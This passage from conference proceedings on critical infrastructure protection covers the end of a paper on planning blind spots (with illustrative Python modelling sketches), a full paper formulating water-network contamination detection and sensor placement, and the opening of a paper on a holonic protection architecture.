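    cross: set = field(default_factory=set)       # step 3: cross-domain links

    def link(self, src: str, dst: str):
        """Step 3: cross-domain interdependency between objects."""
        self.cross.add((src, dst))

    def unreferenced(self):
        """Step 4 aid: objects with no dependency in either direction,
        flagged for review in the next specification iteration."""
        linked = {n for pair in self.cross for n in pair}
        for s in self.systems.values():
            linked |= {n for pair in s.intra for n in pair}
        return [n for s in self.systems.values()
                for n in s.objects if n not in linked]
```

Step 4 is represented here only by a trivial consistency check (unreferenced), standing in for the richer verification and validation techniques of Section 4.4.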
4.3 Scenarios
Scenarios, potentially built on the data and knowledge included in an SDSS, can be used to reveal blind spots. Scenarios can demonstrate how, over time, the interdependencies amongst CI systems and systems of CIs can change. Each scenario connects an initial state and initiating event(s) to desired and undesired end states (different levels of damage), with a sequence of events linking the two; a minimal record of this structure is sketched below. When modeling, the scenarist compiles information together into chunks. Then, the scenarist can bring these chunks together with other experts to form larger pieces of information (larger chunks) that can potentially lead to goals or plans. In this way, a scenario functions as a bridge to connect the communities of modeling and planning [17]. Thus, scenarios can expand knowledge. While scenarios can be designed from a vulnerability or risk assessment mindset, they can also be designed from a red team mindset [9,12]. "Red Team" has been used by the Department of Homeland Security (DHS) and the Institute for Defense Analyses Advanced Warfighting Program to describe the creation of a scenario from the mindset of the enemy [4,9,12]. This is much like Altshuller's theory of inventive problem solving, in which the scenario composer develops a state of mind, rather than just composing scenarios for risk assessment [3].
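A minimal, hypothetical scenario record illustrating this structure (initial state, event chain, end state, and the chunking of events for expert review); none of these field names comes from the cited work.

```python
# Toy scenario record: an initial state linked to an end state by an
# ordered event chain, with simple chunking for expert review.
from dataclasses import dataclass


@dataclass
class Event:
    time: int
    description: str
    affected: list            # names of CI objects involved


@dataclass
class Scenario:
    initial_state: str        # e.g. "normal operations"
    initiating_events: list
    chain: list               # event sequence linking initial to end state
    end_state: str            # desired or undesired outcome
    damage_level: int         # coarse impact scale, e.g. 0-5
    mindset: str = "risk"     # "risk" or "red team" composition mode

    def chunks(self, size: int = 3):
        """Group events into chunks that experts can merge into larger
        ones, mirroring how scenarists build up plans [17]."""
        seq = self.initiating_events + self.chain
        return [seq[i:i + size] for i in range(0, len(seq), size)]
```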
4.4 Verification and Validation
To refine the model and enrich the knowledge base, we employ techniques that reveal blind spots as well as methods to verify and validate those blind spots. Verification asks whether a model behaves according to its specification. Validation asks whether the model behavior reflects the represented phenomenon. By verifying and validating CI models, better information and understanding are gained, and blind spots are revealed. Case-based verification, face validation and Delphi questioning have been used to verify and validate critical infrastructure models [15]. Case-based verification compares actual events to modeled events to assess model accuracy. It allows us to reflect upon how well the model represents the real world. Face validation asks experts to look at the model as a whole, including the data representation, and offer their opinion as to the accuracy of the representation. Delphi questioning asks subject matter experts a series of questions designed to elaborate on the data quality and representative accuracy. Each of these three techniques is used continually to refine the knowledge base in search of blind spots.
5 Conclusions
The sources of blind spots in CIP are potentially endless. An SDSS can incorporate known data/knowledge into a model base which visualizes the CI data/knowledge. Sources of blind spots can be investigated using modeling techniques such as those we have described. These different tools and techniques will allow the planner to assess and resolve vulnerabilities, thereby circumventing potential emergencies. In addition, the planner can develop response plans for emergencies within their domain that can minimize cascading effects. Future research should investigate interoperability amongst different CI planners' domain ontologies using common semantics [2]. Also, consistency constraints should be developed to help the planners understand how to make ontologies with similar descriptions of objects and properties, in order to standardize the process and the resulting datasets [5]. While conducting and applying this research, many observers became interested in what the resulting CI models were demonstrating. It is interesting that, at this time, many facilities managers and industrialists are examining ways to manage their systems. Our research draws attention to the details for which they are responsible and offers a new way of thinking about their systems. CIP is an expanding field that will continue to highlight potentially dangerous issues in need of planning.
References

1. Blind Spot, http://en.wikipedia.org/wiki/File:Blind_spot.JPG
2. Fonseca, F., Camara, G., Monteiro, A.: A Framework for Measuring the Interoperability of Geo-Ontologies. Spatial Cognition and Computation 6(4), 307–329 (2001)
3. Garrick, J.: Perspectives on the use of risk assessment to address terrorism. Risk Analysis 22(3), 421–423 (2002)
4. The National Strategy for Homeland Security. The Office of Homeland Security (July 2002), http://www.whitehouse.gov/homeland/book/nat_strat_hls.pdf (accessed May 30, 2008)
5. Frank, A.U.: Tiers of Ontology and Consistency Constraints in Geographic Information Systems. International Journal of Geographical Information Science 15(7), 667–678 (2001)
6. ICF Consulting: The Economic Cost of the Blackout: An issue paper on the Northeast Blackout (August 14, 2003), http://www.solarstorms.org/ICFBlackout2003.pdf (accessed May 31, 2008)
7. IWS: NERC Welcomes U.S.-Canada Power System Task Force Final Report. Published April 6, 2004 by the North American Electric Reliability Council (accessed May 30, 2008)
8. Kramer, J.: Is Abstraction the Key to Computing? Communications of the ACM 50(4), 37–42 (2007)
9. McNally, R.K., Lee, S.-W., Yavagal, D., Xiang, W.-N.: Learning the Critical Infrastructure Interdependencies Through an Ontology-Based Information System. Environment and Planning B: Planning and Design 34, 1103–1124 (2007)
10. Terner, M., Sutton, R., Hebert, B., Bailey, J., Gilbert, H., Jacqz, C.: Protecting Critical Infrastructure. GeoIntelligence (March 1, 2004), http://www.geointelmag.com/geointelligence/article/articleDetail.jsp?id=90043
11. Tolone, W.J., Xiang, W.-N., Raja, A., Wilson, D., Tang, Q., McWilliams, K., McNally, R.: Mining critical infrastructure information from municipality data sets: a knowledge-driven approach and its applications. In: Hilton, B.N. (ed.) Emerging Spatial Information Systems and Applications, pp. 310–325. Idea Group Publishing, Hershey (2006)
12. Sandoz, J.F.: Red Teaming: A Means to Military Transformation. Report by the Institute for Defense Analyses, Alexandria, VA, Advanced Warfighting Program (2001), http://handle.dtic.mil/100.2/ADA388176
13. Tversky, A., Kahneman, D.: Judgment under Uncertainty: Heuristics and Biases. Science 185, 1124–1131 (1974)
14. Turban, E., Aronson, J.E.: Decision Support Systems and Intelligent Systems. Prentice Hall, Upper Saddle River (2001)
15. Weeks, A.: A Delphi-Case Design Method for Model Validation in Critical Infrastructure Protection Modeling and Simulation. Master's Thesis, Dept. of Geography and Earth Sciences, Univ. of North Carolina at Charlotte (May 2006)
16. Wing, J.: Viewpoint: Computational Thinking. CACM 49(3), 33–35 (2006)
17. Xiang, W.-N., Clarke, K.C.: The use of scenarios in land-use planning. Environment and Planning B: Planning and Design 30(6), 885–909 (2003)
Security of Water Infrastructure Systems

Demetrios G. Eliades and Marios M. Polycarpou

KIOS Research Center for Intelligent Systems and Networks, Dept. of Electrical and Computer Engineering, University of Cyprus, Cyprus
Abstract. This paper formulates the security problem in critical water infrastructure systems for diagnosing quality faults. The proposed scheme is based on the discretized equations of advection and reaction of contaminant concentrations in pipes and tanks, expressed in a state-space form. Faults are signals affecting the states, and their impact is measured based on certain epidemiological dynamics. A multi-objective optimization problem is formulated for minimizing various risk-related objectives.
1 Introduction

Water distribution networks are responsible for the transport of water of good quality to people and industries. They consist of underground pipe networks connected with facilities such as tanks and outflow pipes. The uninterrupted supply of clean, disinfected water is of extreme importance, and failure to deliver water of sufficient quantity or quality can seriously affect the consumers. The management and security of water distribution networks are similar to the management and security of other networked infrastructures, such as power and information systems. Pipe breaks or leakages are considered as hydraulic faults. Quality faults, on the other hand, can occur due to environmental contamination and insufficient or over-supplied chlorination. Moreover, within today's asymmetric warfare, it is possible to "attack" the water supply system by adding sufficient quantities of a contaminant at some parts of the water distribution network, in order to affect the population's health and the economy of a certain area. Terrorist attacks are assumed to be well informed and planned in order to cause maximum damage, be it economic, psychological or physiological. To achieve this, neuralgic locations of the network may be "compromised" by the injection of sufficient quantities of some contaminant substance. Contaminants can enter anywhere in the network and they propagate along the water flow, throughout the network. It is practically impossible to observe all facilities and outflow nodes for detecting a contamination. In addition, contaminant injection can be achieved without actually violating a facility (e.g. a tank), for example by using a pump to reverse the flow in a consumer supply pipe. The general security problem in water distribution systems can be outlined as follows: a) finding the critical locations in the network that are to be monitored by CCTV cameras or other means; b) finding the locations in the network at which to install quality sensors that will detect a contamination early enough, while minimizing the possible overall impact. For a successful security scheme, both problems need to be dealt with. If a contamination is detected early in the network, an alarm should inform the water utility
to take the appropriate measures, such as closing the supply valves and issuing public notices. This paper formulates the security problem in critical water infrastructures for diagnosing quality faults. The proposed scheme is based on the discretized equations of advection and reaction of contaminant concentrations in pipes and tanks, expressed in a state-space form. Faults are signals affecting the states, and their impact is measured based on certain epidemiological dynamics. A multi-objective optimization problem is formulated for minimizing various risk-related objectives.
2 Background

Water distribution networks are comprised of pipes which are connected to storage tanks, reservoirs or other pipes using junctions. Water travels from the storage facilities of the utility and is delivered to the consumers. Tanks connected to the network fill or empty according to a time schedule, or are regulated through automated feedback controllers. Demand is the water outflow from the network, which is driven by consumer requests. In water distribution networks, hydraulic and quality parameters are usually measured through SCADA systems. Hydraulic monitoring is quite common, measuring flow (volume per time) and pressure at various points of the network so as to observe consumption behaviour and detect leaks. Quality monitoring, on the other hand, is not as advanced, and usually involves performing manual sampling or placing sensors at various locations to determine the chemical concentrations of various species such as chlorine (used for disinfection) or other contaminants. Quality faults may occur due to the contamination of water by certain substances, usually chemical, biological or radioactive, which travel along the flow and may exhibit decay or growth dynamics. Ingestion or even inhalation of the contaminated water by consumers may affect the health of the served population; in addition, use of contaminated water in industrial production may cause severe economic losses. Associated with the flow of water, and the contaminants that may be contained in it, are inherent time-delays, which are characterized by the propagation dynamics. Time-delays are not constant, since they are influenced by stochastic variables such as consumer demand behaviour. The quality dynamics of the concentration of a representative species in a water pipe are described by the first-order hyperbolic equations of advection and the chemical reaction dynamics [1]. By neglecting axial dispersion, the mixed advection-reaction equation is described by
$$\frac{\partial c_p(l,t)}{\partial t} + \frac{q_p(t)}{A_p} \frac{\partial c_p(l,t)}{\partial l} = r_p(c_p(l,t)) \qquad (1)$$
where $c_p(l,t)$ is the species concentration at time $t$ and distance $l$ travelled along the pipe $p$. Function $q_p(t)$ corresponds to the time-varying water flow within pipe $p$, driven by the time-varying consumer demand flows of the entire network, and $A_p$ is the cross-sectional area of the pipe. The boundary conditions for each pipe are given by $c(l,0) = c_{0,t}(l)$ and $c(0,t) = c_{0,l}(t)$ for positive sign flow. The right-hand side of (1), $r_p(\cdot)$, describes the chemical reactions affecting species in pipe $p$; if there are no reactions, $r_p(\cdot) = 0$. Numerical methods can be employed to provide an approximation to the solution of (1), as described in [1].

The issue of modelling dangerous contaminant transport in water distribution networks was first examined in [2]. The authors discretized the equations of contaminant transport and simulated a network under contamination. Currently, in water research an open-source hydraulic and quality numerical solver called EPANET is frequently used for computing the advection and reaction dynamics in discrete time using a Lagrangian numerical method [3]. Since there are no commonly defined criteria for expressing and quantifying the security of water systems, most of the current research in water contaminant detection examines the sensor placement problem, using various formulations, assumptions and objectives. The security problem of contaminant detection in water distribution networks was first examined in [4]. An algorithmic "Battle of the Water Sensor Networks" boosted research on the problem and set some useful evaluation benchmarks [5]. Currently, the main approach is to formulate an integer program which is solved using either evolutionary algorithms [6] or mathematical programming [7]. Some groups have worked in an operational research framework in formulating the mathematical program, as in the "p-median" problem [8]. Some work has been conducted within a multi-objective framework, computing the Pareto fronts for conflicting objectives and the sets of non-dominated feasible solutions [9,10]. The concept of security in water distribution networks is still not formally established; therefore it is useful to address certain aspects of security as expressed in different research fields. In general, two types of faults may be considered: a) those that occur randomly, according to a probabilistic model; b) those that are in fact informed attacks seeking to cause maximal damage. As a result, researchers in general have examined sensor placement with respect to either reliability (robustness) or vulnerability. In water distribution literature, the most frequently used metric is the average impact on the network. Recently, other risk-oriented metrics have also been applied [11,7], such as the "Conditional Value at Risk" (CVaR), which corresponds to the average impact of the worst-case scenarios.
3 Mathematical Problem Formulation

In the special case that the contaminant substance does not exhibit decay or growth dynamics, the linear advection equation in a pipe $p$ is given by
$$\frac{\partial c_p(l,t)}{\partial t} + \frac{q_p(t)}{A_p} \frac{\partial c_p(l,t)}{\partial l} = 0, \qquad (2)$$
and corresponds to the movement of a species along the water flow in a pipe. To solve this numerically, the pipe $p$ of length $L_p$ is divided into $N_p$ volume cells of length $\Delta l_p = L_p / N_p$. The length of time step $k$ is $\Delta t$, such that $t = k \Delta t$. In the numerical approximations presented, we assume for simplicity that both flows and velocities are constant during each discrete time step. The constant flow at time-step $k$ is $Q_p(k) = q_p(k \Delta t)$.
We consider the Lax-Wendroff scheme [1, p. 44], a Eulerian finite-difference method [12] which is second-order accurate for smooth solutions and stable if $\frac{|Q_p(k)|}{A_p} \frac{\Delta t}{\Delta l_p} \le 1$. For pipe $p \in \{1,...,m\}$, for $m$ pipes in the network, the discretized equation of the concentration of volume cell $j$, where $j \in \{1,...,N_p\}$, is given by

$$C_{p,j}^{k+1} = \frac{\lambda_p^k}{2}(1+\lambda_p^k) C_{p,j-1}^k + (1-(\lambda_p^k)^2) C_{p,j}^k - \frac{\lambda_p^k}{2}(1-\lambda_p^k) C_{p,j+1}^k, \qquad (3)$$

where $\lambda_p^k = \frac{Q_p(k)}{A_p} \frac{\Delta t}{\Delta l_p}$ and $C_{p,j}^k$ is the concentration of contaminant in pipe $p$, volume cell $j$ and at time-step $k$. In the case when the contaminant exhibits decay or growth dynamics, these are described by Differential-Algebraic Equations [13]. For simplicity, we consider first-order reaction dynamics, $\frac{d}{dt} c_p(l,t) = K_p c_p(l,t)$, where $K_p$ is a reaction coefficient of pipe $p$; for $K_p > 0$ the substance concentration grows and for $K_p < 0$ it decays. Reaction coefficients may be different in each pipe and are usually estimated with field tests. In discrete time and space, using the second-order Runge-Kutta method, the volume cell concentration is

$$C_{p,j}^{k+1} = \left(1 - K_p \Delta t + \tfrac{1}{2} K_p^2 \Delta t^2\right) C_{p,j}^k = \gamma_p C_{p,j}^k, \qquad (4)$$

where $\gamma_p = (1 - K_p \Delta t + \tfrac{1}{2} K_p^2 \Delta t^2)$ for pipe $p$. By using the fractional step method [1], the discrete-time advection-reaction equation for volume cell $j$ in pipe $p$ is given by

$$C_{p,j}^{k+1} = \gamma_p \left[ \frac{\lambda_p^k}{2}(1+\lambda_p^k) C_{p,j-1}^k + (1-(\lambda_p^k)^2) C_{p,j}^k - \frac{\lambda_p^k}{2}(1-\lambda_p^k) C_{p,j+1}^k \right]. \qquad (5)$$

Junctions connecting pipes are considered as boundary points and are assumed to be virtual cells whose concentration depends on the inflow concentrations. Tanks are considered as discrete-volume cells with hydraulic dynamics, such that $\frac{d}{dt}\left[v_r(t) c_r(t)\right] = q_{r,i}^T(t) c_{r,i}(t) - q_{r,o}(t) c_r(t) + K_r c_r(t)$, where $v_r(t)$ is the tank's volume, $c_r(t)$ is the contaminant concentration in the tank, $q_{r,i}(t)$ is the vector of tank inflows along with the associated contaminant concentrations $c_{r,i}(t)$; $q_{r,o}(t)$ is the sum of the tank's outflows and $K_r$ the reaction coefficient. In discrete time this is expressed as

$$C_r^{k+1} = \frac{Q_{r,i}^k}{V_r^{k+1}} C_{r,i}^k + \frac{V_r^k - Q_{r,o}^k \Delta t - K_r \Delta t}{V_r^{k+1}} C_r^k, \qquad (6)$$

where $V_r^k$ is the tank's volume at time $k$, $C_r^k$ is the concentration in the tank, $Q_{r,i}^k$ is the vector of tank inflows along with the associated contaminant concentrations $C_{r,i}^k$; $Q_{r,o}^k$ is the sum of the tank's outflows. When only one contaminant is considered in the network, there are in total $\bar{n} = \sum_{i=1}^{m} N_i + m_r$ volume cells in the water distribution network, where $N_i$ is the number of discrete volume cells for pipe $i$, $m$ is the number of pipes and $m_r$ is the number of tanks in the network.
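As an informal illustration, the following Python sketch transcribes the advection-reaction update (5) for a single pipe, under the stated assumption of constant flow during the step. Junction mixing and network coupling are omitted, and the boundary handling shown is a placeholder rather than the treatment used in EPANET.

```python
import numpy as np

def advect_react_step(C, Q, A, dl, dt, K):
    """One discrete-time step of (5) for a single pipe.
    C : concentrations of the N volume cells at time k (array)
    Q : flow during the step (constant over the step, as assumed above)
    A : pipe cross-sectional area; dl, dt : cell length and time step
    K : first-order reaction coefficient (K < 0 for decay).
    Boundary cells are kept fixed here for simplicity; in a network they
    would be set from junction mixing, which this sketch omits."""
    lam = Q / A * dt / dl
    assert abs(lam) <= 1.0, "Lax-Wendroff stability condition violated"
    gamma = 1.0 - K * dt + 0.5 * (K * dt) ** 2   # gamma_p as in (4)
    Cm, Cp = np.roll(C, 1), np.roll(C, -1)        # C_{j-1}, C_{j+1}
    Cnew = gamma * (0.5 * lam * (1 + lam) * Cm
                    + (1 - lam ** 2) * C
                    - 0.5 * lam * (1 - lam) * Cp)
    Cnew[0], Cnew[-1] = C[0], C[-1]               # placeholder boundaries
    return Cnew
```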
Based on the network topology and the interconnections, it is possible to express the quality dynamics in a state-space form, where each state is the contaminant concentration in a finite volume, such that $x_i(k) = C_{p,j}^k$. The state-space representation will assist us in expressing faults and uncertainty in a straightforward manner. The set of equations describing the concentrations of each finite volume in the network is formulated into a discrete-time dynamic system with $\bar{n}$ states, such that

$$x(k+1) = A(k)x(k) + \varphi(k), \qquad (7)$$

where $k = \{0,1,...\}$ and $x \in \mathbb{R}^{\bar{n}}$ is the state vector, with zero initial conditions. The time-varying state matrix $A \in \mathbb{R}^{\bar{n} \times \bar{n}}$ is computed through a nonlinear function $A(k) = f_A(Q(k), H(k), U_c(k))$, where $Q(k)$ is the vector of pipe flows, $H(k)$ is the vector of tank water heights and $U_c(k)$ is the hydraulic controls vector. We assume that matrix $A(k)$ represents the nominal healthy dynamics. The term $\varphi \in \Phi$, $\Phi \subset \mathbb{R}^{\bar{n}}$, corresponds to the changes in the system's dynamics due to a fault. We further assume that there is a finite set $\mathcal{F}$ comprised of $N$ fault functions which constitute a representative sample of the possible fault functions for the system, $\mathcal{F} = \{\varphi^1(k), ..., \varphi^N(k)\}$. For the $i$-th fault function, $\varphi^i(k) \in \mathcal{F}$ is a vector of fault signals, $\varphi^i(k) = [g_1^i(k,\theta_1^i), ..., g_{\bar{n}}^i(k,\theta_{\bar{n}}^i)]^T$, where $i = \{1,...,N\}$; the known functions $g_j^i(k,\theta_j^i)$ describe the structure of fault $i$ affecting state $j$, and the unknown parameters $\theta_j^i \in \Theta$ its characteristics, where $\Theta \subset \mathbb{R}^{\nu}$, $\nu = |\theta_j^i|$.

The impact due to a contamination fault could be directly expressed in two ways: (a) in epidemiological terms, e.g. the number of people infected; (b) economically, e.g. the cost of fault accommodation. Other indirect measures of the fault's impact can also be considered, such as the consumed volume of contaminated water that exceeds a certain concentration threshold [5]. Various nonlinear epidemiological models suitable for water contamination and human health have been proposed in previous research [5,14,15,16]. We define $\bar{y} \in \mathbb{R}^n$ as the vector of "nodal" states, computed from $\bar{y}(k) = Cx(k)$, where $C \in \mathbb{R}^{n \times \bar{n}}$ has all its elements zero except one element in each row with value "1"; the row vectors are linearly independent and $n \le \bar{n}$. We further define nodes $V = \{v_1, ..., v_n\}$ as the locations where water can be consumed, corresponding to the $n$ finite-volume cells that are measured in the "nodal" vector $\bar{y}(k)$. Let $d \in \mathbb{R}^n$ such that $d_i(k)$ is the normalized water outflow of node $v_i$ at time $k$; similarly, $\bar{y}_i(k)$ is the concentration of contaminant at node $v_i$ at time $k$. A generic state-space representation of the fault impact is

$$\xi(k+1) = \xi(k) + f_{\Xi}(\bar{y}(k), d(k)), \qquad (8)$$
$$\bar{\omega}(k) = f_{\Omega}(\xi(k)), \qquad (9)$$

where $\xi \in \mathbb{R}^n$ is the nodal, and $\bar{\omega} \in \mathbb{R}$ the total impact metric. These are computed with the nonlinear functions $f_{\Xi}: \mathbb{R}^n \times \mathbb{R}^n \to \mathbb{R}^n$ and $f_{\Omega}: \mathbb{R}^n \to \mathbb{R}$. For example, $f_{\Xi}(\cdot)$ can correspond to the consumed contaminated water, where $f_{\Xi}(\bar{y}_i(k), d_i(k)) = d_i(k)\Delta t$ if $\bar{y}_i(k)$ is greater than a threshold; otherwise it is zero. The total consumption is the sum of the impact states, computed using $f_{\Omega}(\xi(k)) = \mathbf{1}^T \xi(k)$.
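To make the impact computation concrete, the sketch below runs (7)-(9) for one fault function using the consumed-contaminated-water example above; the function signature and data layout are assumptions made for illustration, not the authors' implementation.

```python
import numpy as np

def total_impact(A_seq, phi, C, d_seq, dt, eps):
    """Run (7)-(9) for one fault phi and return the impact trajectory.
    A_seq : list of state matrices A(k);  phi : fault function phi(k)
    C     : nodal selection matrix;      d_seq: nodal demands d(k)
    A node accumulates d_i(k)*dt whenever its concentration exceeds eps
    (the consumed-contaminated-water choice of f_Xi above)."""
    n_bar = A_seq[0].shape[0]
    x = np.zeros(n_bar)                    # zero initial conditions
    xi = np.zeros(C.shape[0])              # nodal impact states, eq. (8)
    omega = []
    for k, A in enumerate(A_seq):
        x = A @ x + phi(k)                 # state update, eq. (7)
        y = C @ x                          # nodal concentrations
        xi = xi + np.where(y > eps, d_seq[k] * dt, 0.0)
        omega.append(xi.sum())             # f_Omega = 1^T xi, eq. (9)
    return np.array(omega)
```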
4 Methodology for Sensor Placement

We apply discrete grid sampling in the region enclosed by $\Theta$ in order to create the vectors $\bar{\theta}_i \in \Theta$, for $i = \{1,...,l\}$, where $l$ is the number of samples.
We define a contamination scenario $s_i^j \in S$ as the fault function $\varphi^j(k)$ with parameter $\bar{\theta}_i$, i.e. $s_i^j = \varphi^j(k)|_{\bar{\theta}_i}$. For each fault function there are $l$ different parameters; therefore the set of all the fault functions with different parameters is $S = \{s_1^1, ..., s_l^1, ..., s_1^N, ..., s_l^N\}$, where $N$ is the number of fault functions and $l$ the number of grid samples. For example, a hypothetical scenario is $s_1^1 = [g(k, \bar{\theta}_1), 0, ..., 0]^T$, where $g(\cdot)$ is a known function. We can now compute the global impact of a contamination scenario until it is first detected at a node (due to a sensor installed). Let $\omega(v_i, s^j)$ be the impact (e.g. number of people affected) until a fault corresponding to scenario $s^j \in S$ is detected by node $v_i$. Therefore, $\omega(v_i, s^j) = \{\bar{\omega}(k_d) : k_d = \min\{k : \bar{y}_i(k) > \varepsilon\}, \varepsilon \in \mathbb{R}^+\}$, where $\omega: V \times S \to \mathbb{R}$; $\varepsilon$ represents the minimum amount of contaminant concentration that needs to be present before a sensor is able to make a detection decision, and $k_d$ the earliest time-step at which the detection occurs. In relation to the sensor placement problem, when there is more than one sensor in the network, the impact of a fault scenario $s \in S$ is the minimum impact among all the impacts computed for each node/sensor; essentially it corresponds to the sensor that detects the fault first. Let $X$ be a set of nodes, such that $X \subset V$. We define three objective functions $f_i: X \to \mathbb{R}$, $i = \{1,2,3\}$, that map a set of nodes $X$ to a real number. Function $f_1(X)$ is the average impact of the set of all scenarios, and $f_2(X)$ is the maximum impact of the set of all scenarios; function $f_3(X)$ corresponds to the CVaR risk metric and is the average impact of the scenarios in the set $S^* \subset S$ with impact larger than $\alpha f_2(X)$, where $\alpha \in [0,1]$:

$$f_1(X) = \frac{1}{|S|} \sum_{s \in S} \min_{\chi \in X} \omega(\chi, s) \qquad (10)$$

$$f_2(X) = \max_{s \in S} \min_{\chi \in X} \omega(\chi, s) \qquad (11)$$

$$f_3(X) = \frac{1}{|S^*|} \sum_{s \in S^*} \min_{\chi \in X} \omega(\chi, s), \qquad (12)$$

where $S^* = \left\{ s^i \in S,\ i = \{1,...,Nl\} : \min_{\chi \in X} \omega(\chi, s) \ge \alpha f_2(X) \right\}$. The multi-objective optimization problem is formulated as:

$$\min_X \{f_1(X), f_2(X), f_3(X)\}, \qquad (13)$$

subject to $X \subset \mathcal{V}$ and $|X| = N_s$, where $\mathcal{V} \subseteq V$ is the set of feasible nodes and $N_s$ the number of sensors to be placed. This problem can be solved using multi-objective evolutionary optimization or any other Pareto-front optimization method. Due to space limitations, no simulation studies are presented to illustrate the proposed methodology for sensor placement.
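Assuming the scenario impacts $\omega(v, s)$ have been precomputed into a matrix, the three objectives of (10)-(12) reduce to a few array operations, as the sketch below shows; it illustrates the definitions only, not the optimization method itself.

```python
import numpy as np

def objectives(omega, X, alpha):
    """Evaluate f1-f3 of (10)-(12) for one candidate sensor set X.
    omega : |V| x |S| matrix, omega[i, j] = impact of scenario j when
            first detected at node i (precomputed by impact simulation)
    X     : indices of the sensor nodes; alpha in [0, 1]."""
    per_scenario = omega[list(X), :].min(axis=0)   # first-detecting sensor
    f1 = per_scenario.mean()                       # average impact   (10)
    f2 = per_scenario.max()                        # worst case       (11)
    tail = per_scenario[per_scenario >= alpha * f2]
    f3 = tail.mean()                               # CVaR-style       (12)
    return f1, f2, f3
```

Each call evaluates one set $X$; a Pareto-front method such as a multi-objective evolutionary algorithm, as suggested in the text, would invoke it for many candidate sets.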
5 Conclusions

In this work we have presented the security and fault detection problem of critical water infrastructure. Based on the first-order hyperbolic equations of advection and reaction
within pipes we have presented a mathematical formulation suitable for fault diagnosis. A multi-objective optimization problem was proposed for determining sensor locations, in order to detect faults using sensors measuring contaminant concentrations. Three risk-oriented objective functions are considered in the optimization problem, for reducing the fault’s impact. Further research will investigate the problems of hydraulic and quality fault detection, fault isolation in order to determine the intrusion location and fault identification in order to estimate the magnitude and type of the contamination. Acknowledgments. This work is partially supported by the Cyprus Research Promotion Foundation and the University of Cyprus.
References

1. LeVeque, R.: Nonlinear Conservation Laws and Finite Volume Methods. In: Computational Methods for Astrophysical Fluid Flow, pp. 1–159. Springer, Berlin (1998)
2. Kurotani, K., Kubota, M., Akiyama, H., Morimoto, M.: Simulator for contamination diffusion in a water distribution network. In: Proc. IEEE IECON 21st International Conference on Industrial Electronics, Control, and Instrumentation, November 6-10, vol. 2, pp. 792–797 (1995)
3. Rossman, L.A.: The EPANET programmer's toolkit for analysis of water distribution systems. In: Proc. of ASCE 29th Annual Water Resources Planning and Management Conference, pp. 39–48 (1999)
4. Kessler, A., Ostfeld, A., Sinai, G.: Detecting accidental contaminations in municipal water networks. ASCE Journal of Water Resources Planning and Management 124(4), 192–198 (1998)
5. Ostfeld, A., Uber, J.G., Salomons, E., Berry, J.W., Hart, W.E., Phillips, C.A., Watson, J.P., Dorini, G., Jonkergouw, P., Kapelan, Z., di Pierro, F., Khu, S.T., Savic, D., Eliades, D., Polycarpou, M., Ghimire, S.R., Barkdoll, B.D., Gueli, R., Huang, J.J., McBean, E.A., James, W., Krause, A., Leskovec, J., Isovitsch, S., Xu, J., Guestrin, C., Van Briesen, J., Small, M., Fischbeck, P., Preis, A., Propato, M., Piller, O., Trachtman, G.B., Wu, Z.Y., Walski, T.: The battle of the water sensor networks (BWSN): A design challenge for engineers and algorithms. ASCE Journal of Water Resources Planning and Management (2008) (to appear)
6. Huang, J.J., McBean, E.A., James, W.: Multi-objective optimization for monitoring sensor placement in water distribution systems. In: Proc. of ASCE 8th Annual Water Distribution System Analysis Symposium (2006)
7. Hart, W., Berry, J., Riesen, L., Murray, R., Phillips, C., Watson, J.: SPOT: A sensor placement optimization toolkit for drinking water contaminant warning system design. In: Proc. World Water and Environmental Resources Conference (2007)
8. Berry, J.W., Fleischer, L., Hart, W.E., Phillips, C.A., Watson, J.P.: Sensor placement in municipal water networks. ASCE Journal of Water Resources Planning and Management 131(3), 237–243 (2005)
9. Eliades, D., Polycarpou, M.: Iterative deepening of Pareto solutions in water sensor networks. In: Proc. of ASCE 8th Annual Water Distribution System Analysis Symposium, ASCE (2006)
10. Eliades, D.G., Polycarpou, M.M.: Multi-objective optimization of water quality sensor placement in drinking water distribution networks. In: Proc. of European Control Conference, pp. 1626–1633 (2007)
11. Watson, J.P., Hart, W.E., Murray, R.: Formulation and optimization of robust sensor placement problems for contaminant warning systems. In: Proc. of ASCE 8th Annual Water Distribution System Analysis Symposium, ASCE (2006)
12. Rossman, L.A., Boulos, P.F.: Numerical methods for modeling water quality in distribution systems: A comparison. ASCE Journal of Water Resources Planning and Management 122(2), 137–146 (1996)
13. Shang, F., Uber, J.G., Rossman, L.A.: EPANET Multi-Species Extension User's Manual. National Risk Management Research Laboratory, Office of Research and Development, U.S. Environmental Protection Agency, Cincinnati, OH 45268 (August 2007)
14. Murray, R., Uber, J., Janke, R.: Model for estimating acute health impacts from consumption of contaminated drinking water. Journal of Water Resources Planning and Management 132(4), 293–299 (2006)
15. Chick, S., Koopman, J., Soorapanth, S., Brown, M.: Infection transmission system models for microbial risk assessment. The Science of the Total Environment 274(1-3), 197–207 (2001)
16. Chick, S., Soorapanth, S., Koopman, J.: Inferring infection transmission parameters that influence water treatment decisions. Management Science 49(7), 920–935 (2003)
Critical Infrastructures as Complex Systems: A Multi-level Protection Architecture

Pierluigi Assogna4, Glauco Bertocchi3, Antonio DiCarlo2,5, Franco Milicchio1, Alberto Paoluzzi1,5, Giorgio Scorzelli1,5, Michele Vicentino5, and Roberto Zollo4,5

1 Department of Informatics and Automation, University "Roma Tre", Italy
2 Department of Studies on Structures, University "Roma Tre", Italy
3 Master on Security and Protection, University of Rome "La Sapienza", Italy
4 Theorematica spa, Rome, Italy
5 TRS (Technology & Research for Security) srl, Rome, Italy
Abstract. This paper describes a security platform as a complex system of holonic communities, which are hierarchically organized but self-reconfigurable when some of them are detached or cannot otherwise operate. Furthermore, every possible subset of holons may work autonomously, while maintaining awareness of its own mission, action lines and goals. Each holonic unit, either elementary or composite, retains some capabilities for sensing (perception), transmissive apparatus (communication), computational processes (elaboration), authentication/authorization (information security), support for data exchange (visualization & interaction), actuators (mission), ambient representation (geometric reasoning), knowledge representation (logic reasoning), situation representation and forecasting (simulation), and intelligent feedback (command & control). The higher the organizational level of the holonic unit, the more complex and sophisticated each of these characteristic features becomes.
1 Introduction
Complexity is ill-defined, as expounded by [1] in the inaugural paper of the homonymous journal. For our present purposes, the non-mathematical definition provided by the Complex Systems Society on its web page [2], where critical infrastructures are mentioned as exemplary, is good enough. If controlling a complex system is the issue at stake, then the stress should be laid on integration: monitoring and simulating the behavior of its parts separately is pointless, unless the same (or better) care is taken of their interactions. Recognizing global behavioral patterns, through (space and time) correlation among local events, is more important than detecting minute details. However, in a highly nonlinear system, some local minutia may have a strong global impact, and nobody can
